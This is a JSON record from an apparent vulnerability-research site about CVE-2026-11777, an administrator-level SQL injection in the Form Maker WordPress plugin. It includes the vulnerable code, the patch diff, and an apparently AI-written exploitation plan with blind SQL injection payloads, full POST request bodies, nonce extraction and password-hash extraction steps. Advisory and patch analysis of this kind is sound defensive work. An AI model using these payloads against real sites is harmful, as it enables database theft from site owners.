[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fZiMn9GI-NcrJf7RNhFoj6uKWq6Pr7qQW69gDHrXWfq8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":27,"research_verified":28,"research_rounds_completed":29,"research_plan":30,"research_summary":31,"research_vulnerable_code":32,"research_fix_diff":33,"research_exploit_outline":34,"research_model_used":35,"research_started_at":36,"research_completed_at":37,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":28,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":28,"source_links":38},"CVE-2026-11777","form-maker-by-10web-authenticated-administrator-sql-injection-via-name-parameter","Form Maker by 10Web \u003C= 1.15.43 - Authenticated (Administrator+) SQL Injection via 'name' Parameter","The Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder plugin for WordPress is vulnerable to generic SQL Injection via the 'name' parameter in all versions up to, and including, 1.15.43 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","form-maker",null,"\u003C=1.15.43","1.15.44","medium",4.9,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-06-17 16:12:22","2026-06-18 04:31:09",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F513f407d-e90f-4fd1-82dd-c28bab9f76d0?source=api-prod",1,[22,23,24,25,26],"admin\u002Fmodels\u002FFMSelectDataFromDb.php","admin\u002Fmodels\u002FFMSqlMapping.php","form-maker.php","framework\u002FWDW_FM_Library.php","readme.txt","researched",false,3,"# Exploitation Research Plan - CVE-2026-11777\n\n## 1. Vulnerability Summary\nThe **Form Maker by 10Web** plugin (up to 1.15.43) is vulnerable to a SQL injection in the `get_table_struct` method within both `FMModelSelect_data_from_db` and `FMModelFormMakerSQLMapping` classes. The vulnerability exists because user-supplied input from the `name` parameter is concatenated directly into a `SHOW COLUMNS FROM` SQL statement without being prepared or properly escaped. While the input passes through `sanitize_text_field`, this function does not prevent SQL injection when the input is used within backticks or as part of a raw query string.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `select_data_from_db` or `FormMakerSQLMapping` (This plan targets `select_data_from_db`)\n- **Vulnerable Parameter:** `name`\n- **Authentication:** Required (Administrator+)\n- **Preconditions:** The attacker must be logged in as an administrator. The plugin must be active.\n\n## 3. Code Flow\n1. **Entry Point:** The plugin registers AJAX handlers in `form-maker.php` via `add_action('wp_ajax_select_data_from_db', array($this, 'form_maker_ajax'))`.\n2. **Controller Dispatch:** `WDFM::form_maker_ajax` (in `form-maker.php`) dispatches the request to the appropriate controller (inferred to be `FMAdminControllerSelect_data_from_db`).\n3. **Model Method:** The controller calls `FMModelSelect_data_from_db::get_table_struct()`.\n4. **Vulnerable Sink:** In `admin\u002Fmodels\u002FFMSelectDataFromDb.php`:\n   - `$name` is retrieved using `WDW_FM_Library(self::PLUGIN)->get('name', NULL)`.\n   - The query is built: `$query = 'SHOW COLUMNS FROM `' . $name . '`';`.\n   - The query is executed: `$wpdb->get_results($query);`.\n5. **Injection:** By supplying a value for `name` that includes a closing backtick (`` ` ``), an attacker can escape the table name context and append arbitrary SQL clauses (like `WHERE`) supported by the `SHOW COLUMNS` command.\n\n## 4. Nonce Acquisition Strategy\nThe plugin uses a nonce identified by the property `$this->nonce = 'nonce_fm'` in the `WDFM` class. This nonce is typically localized for use in admin scripts.\n\n1. **Identify Page:** The Form Maker \"Forms\" management page is a reliable place for the script to be enqueued.\n   - URL: `\u002Fwp-admin\u002Fadmin.php?page=manage_fm`\n2. **Navigate:** Use `browser_navigate` to load the page as an authenticated Administrator.\n3. **Extract Nonce:** Use `browser_eval` to extract the nonce from the localized JavaScript object.\n   - Expected Variable: `fm_object.nonce` (based on common 10Web plugin patterns) or search for any localized script containing \"nonce\".\n   - Command: `browser_eval(\"window.fm_object ? fm_object.nonce : 'not_found'\")`\n\n## 5. Exploitation Strategy\nWe will use a time-based blind SQL injection because `SHOW COLUMNS` does not easily support `UNION` but its `WHERE` clause allows subqueries.\n\n### Step 1: Authentication\nLogin as an Administrator using `wp_login`.\n\n### Step 2: Nonce Extraction\nNavigate to the Form Maker dashboard and extract the `nonce_fm` value.\n\n### Step 3: Payload Construction\nWe will target the `name` parameter. The target query is: `SHOW COLUMNS FROM \\`$name\\``.\n- **Payload:** `wp_users` WHERE 1=1 AND (SELECT 1 FROM (SELECT SLEEP(5))a) -- `\n- **Encoded Payload:** `wp_users%60%20WHERE%201%3D1%20AND%20%28SELECT%201%20FROM%20%28SELECT%20SLEEP%285%29%29a%29%20--%20`\n- **Resulting Query:** `SHOW COLUMNS FROM `wp_users` WHERE 1=1 AND (SELECT 1 FROM (SELECT SLEEP(5))a) -- ``\n\n### Step 4: HTTP Request (using `http_request`)\n- **Method:** POST\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Headers:**\n  - `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:**\n  ```text\n  action=select_data_from_db\n  &task=get_table_struct\n  &name=wp_users` WHERE 1=1 AND (SELECT 1 FROM (SELECT SLEEP(5))a) -- \n  &nonce_fm=[EXTRACTED_NONCE]\n  ```\n\n## 6. Test Data Setup\n1. **User:** Ensure an administrator user exists (standard `admin`\u002F`password`).\n2. **Plugin:** Ensure \"Form Maker\" is activated.\n3. **Form:** No specific form needs to be created as the vulnerability is in the database interrogation logic used by the admin UI.\n\n## 7. Expected Results\n- **Success:** The HTTP response will be delayed by approximately 5 seconds.\n- **Data Leakage (Boolean-based):** To extract the admin password hash, we would iterate:\n  - `name=wp_users` WHERE (SELECT ASCII(SUBSTRING(user_pass,1,1)) FROM wp_users WHERE ID=1) > 64 -- `\n  - If the first character of the hash has an ASCII value > 64, the response will contain the column list for `wp_users`. If not, it will be an empty result.\n\n## 8. Verification Steps\nAfter the exploitation attempt, verify the vulnerability exists by checking the source code of the installed plugin:\n1. Use `grep` to find the vulnerable line in the model:\n   ```bash\n   grep -n \"SHOW COLUMNS FROM\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fform-maker\u002Fadmin\u002Fmodels\u002FFMSelectDataFromDb.php\n   ```\n2. Confirm the version is \u003C= 1.15.43:\n   ```bash\n   grep \"Version:\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fform-maker\u002Fform-maker.php\n   ```\n\n## 9. Alternative Approaches\nIf `select_data_from_db` is unavailable, use the `FormMakerSQLMapping` action which hits the same vulnerable logic in `admin\u002Fmodels\u002FFMSqlMapping.php`:\n- **Body:**\n  ```text\n  action=FormMakerSQLMapping\n  &task=get_table_struct\n  &name=wp_users` WHERE 1=1 AND (SELECT 1 FROM (SELECT SLEEP(5))a) -- \n  &nonce_fm=[EXTRACTED_NONCE]\n  ```\nAdditionally, if `SLEEP()` is blocked, use a boolean-based approach by matching the presence of column names in the JSON response (e.g., searching for `\"user_login\"` in the output).","The Form Maker by 10Web plugin for WordPress is vulnerable to an authenticated SQL injection via the 'name' parameter in versions up to 1.15.43. This is due to the plugin directly concatenating unsanitized user input into a 'SHOW COLUMNS FROM' query, allowing administrators to execute arbitrary SQL commands through blind injection techniques.","\u002F\u002F admin\u002Fmodels\u002FFMSelectDataFromDb.php lines 102-110\n    $name = WDW_FM_Library(self::PLUGIN)->get('name', NULL);\n    if ( !$name ) {\n      return array();\n    }\n    $con_method = WDW_FM_Library(self::PLUGIN)->get('con_method', NULL);\n    $con_type = WDW_FM_Library(self::PLUGIN)->get('con_type', NULL);\n    $query = 'SHOW COLUMNS FROM `' . $name . '`';\n\n---\n\n\u002F\u002F admin\u002Fmodels\u002FFMSqlMapping.php lines 97-105\n    $name = WDW_FM_Library(self::PLUGIN)->get('name', NULL);\n    if ( !$name ) {\n      return array();\n    }\n    $con_method = WDW_FM_Library(self::PLUGIN)->get('con_method', NULL);\n    $con_type = WDW_FM_Library(self::PLUGIN)->get('con_type', NULL);\n    $query = 'SHOW COLUMNS FROM `' . $name . '`';","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fform-maker\u002F1.15.43\u002Fadmin\u002Fmodels\u002FFMSelectDataFromDb.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fform-maker\u002F1.15.44\u002Fadmin\u002Fmodels\u002FFMSelectDataFromDb.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fform-maker\u002F1.15.43\u002Fadmin\u002Fmodels\u002FFMSelectDataFromDb.php\t2019-04-16 08:39:22.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fform-maker\u002F1.15.44\u002Fadmin\u002Fmodels\u002FFMSelectDataFromDb.php\t2026-06-10 12:23:34.000000000 +0000\n@@ -79,6 +79,22 @@\n   }\n \n   \u002F**\n+   * Validate a table name against allowed identifier characters and a table list.\n+   *\n+   * @param string $name\n+   * @param array  $tables\n+   *\n+   * @return bool\n+   *\u002F\n+  private function is_valid_table_name( $name, $tables ) {\n+    if ( ! is_string( $name ) || ! preg_match( '\u002F^[A-Za-z0-9_]+$\u002F', $name ) ) {\n+      return false;\n+    }\n+\n+    return in_array( $name, (array) $tables, true );\n+  }\n+\n+  \u002F**\n    * Get table struct.\n    *\n    * @return object $table_struct\n@@ -91,6 +107,10 @@\n     }\n     $con_method = WDW_FM_Library(self::PLUGIN)->get('con_method', NULL);\n     $con_type = WDW_FM_Library(self::PLUGIN)->get('con_type', NULL);\n+    $tables = $this->get_tables();\n+    if ( ! $this->is_valid_table_name( $name, $tables ) ) {\n+      return array();\n+    }\n     $query = 'SHOW COLUMNS FROM `' . $name . '`';\n     if ( $con_type == 'remote' ) {\n       $username = WDW_FM_Library(self::PLUGIN)->get('username', '');\n@@ -128,6 +148,10 @@\n     if ( !$name ) {\n       return array();\n     }\n+    $tables = $this->get_tables_saved( $con_type, $username, $password, $database, $host );\n+    if ( ! $this->is_valid_table_name( $name, $tables ) ) {\n+      return array();\n+    }\n     $query = 'SHOW COLUMNS FROM `' . $name . '`';\n     if ( $con_type == 'remote' ) {\n       $wpdb_temp = new wpdb($username, $password, $database, $host);","The exploit targets the 'select_data_from_db' or 'FormMakerSQLMapping' AJAX actions available to authenticated Administrators. An attacker first logs in and extracts the 'nonce_fm' security token from the admin interface. They then send a POST request to admin-ajax.php with the 'name' parameter containing a SQL payload designed to escape the backtick identifier (e.g., `wp_users` WHERE 1=1 AND (SELECT 1 FROM (SELECT SLEEP(5))a) -- `). Because the input is used directly in a 'SHOW COLUMNS FROM' query, the attacker can leverage the WHERE clause support in that command to perform time-based or boolean-based blind SQL injection to exfiltrate database contents.","gemini-3-flash-preview","2026-06-25 22:02:22","2026-06-25 22:02:51",{"type":39,"vulnerable_version":40,"fixed_version":11,"vulnerable_browse":41,"vulnerable_zip":42,"fixed_browse":43,"fixed_zip":44,"all_tags":45},"plugin","1.15.43","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fform-maker\u002Ftags\u002F1.15.43","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fform-maker.1.15.43.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fform-maker\u002Ftags\u002F1.15.44","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fform-maker.1.15.44.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fform-maker\u002Ftags"]